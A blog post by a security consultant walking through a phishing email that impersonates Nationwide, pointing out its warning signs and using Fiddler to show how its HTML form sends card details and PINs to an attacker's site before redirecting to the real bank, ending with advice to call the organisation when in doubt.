Phishing Email Example (@AskNationwide)

So like most of you I get lots of phishing emails that get captured normally. I do however like to look at them and see what they are doing. This one I got today contains so many things wrong it was worth looking at.

As you can see firstly the “From” name is different to the “Email” address it came from, or should I say the one it tells me it is from. For a financial organization to not use a valid domain for the email would be very rare. Secondly we see an attachment which is in “HTML” format, which just would not happen. Normally organizations like this would send a link to an online service or in reality if it was activity deemed as suspicious they would have called you by now. Lastly we see instructions of completing the form which of course is completely against any security policy.

So what does the form contain?

If we download the “HTML” file and open it up we see that it is encoded.

Of course we could take some time to see what it is doing by breaking open the encoded text, however it is much more fun to see what it looks like in the browser.

How good does that look?

If you hover on the links they all point to valid locations. An example would be the “Getting Started” link on the left which is pointing to the real site ““.

Notice the glaring issues with the form?

All of the details being asked for would not be needed at all, only as confirmation “maybe“, once you had logged back into your account first. I particularly like how the form asks for all the card details including “ATM Pin” which no financial institution would ever ask for. Then asking for personal details which then will help the attacker to “pretend” to be you.

If we now press the “Continue” button with empty values, we see it even has validation. Notice that I can type whatever I want in those fields and they get confirmed, which in reality would not happen either. Most legitimate sites use some “on-the-fly” validation now to assist with this.

Now let’s “Continue” button after completing the details. We get a little message.

Using fiddler, we can see that it sends some data to a site that is under the financial institution real sites.

However it also tries to submit the data to the following URL.

Once this piece is completed it then redirects back to the valid website for “Nationwide“. Taking a closer look at the steps you can see the flow.

  1. Existing Nationwide site
  2. Custom “Submission” site
  3. Existing Nationwide site

So what was submitted to the “Submission” site?

Using fiddler we can simply select the custom site URL and see the “POST” details. Using the “WebForms“, view we can see all of our data that was posted from the form.

It is sent in the URL as “POST” request.

Using the “TextView” we can see the full “POST” URL.


So the word of warning here is to check and check again before you ever use a process like this. If you get an email that looks legit but are not 100% sure, call the organization first to double check, better to be safe than sorry.







Liam Cleary

Liam began his career as a Trainer of all things computer-related. He quickly realized that programming, breaking, and hacking was a lot more fun. He spent the next few years working within core infrastructure and security services until he found SharePoint. He is the founder and owner of SharePlicity, a consulting company that focuses on all areas of Technology. His role within SharePlicity is to help organizations implement technology that will enhance internal and external collaboration, document and records management, automate business processes, and of course security controls and protection. Liam also serves as the Principal Technology Advisor at Rencore, where he is helping to develop offerings that help organizations further understand and mitigate security and compliance risks, within SharePoint and Office 365 customization's. His core focus will is to identify, control, and protect whether they are full-fledged customization's or out-of-the-box Office 365 functionality. He is also a thirteen-time Microsoft MVP focusing on Architecture but also crosses the boundary into Development. He is also a Microsoft Certified Trainer (MCT). His specialty over the past few years has been security in SharePoint and its surrounding platforms. He can often be found at user groups or conferences speaking, offering advice, spending time in the community, teaching his kids how to code, raspberry PI programming, hacking the planet or building Lego robots.

You may also like...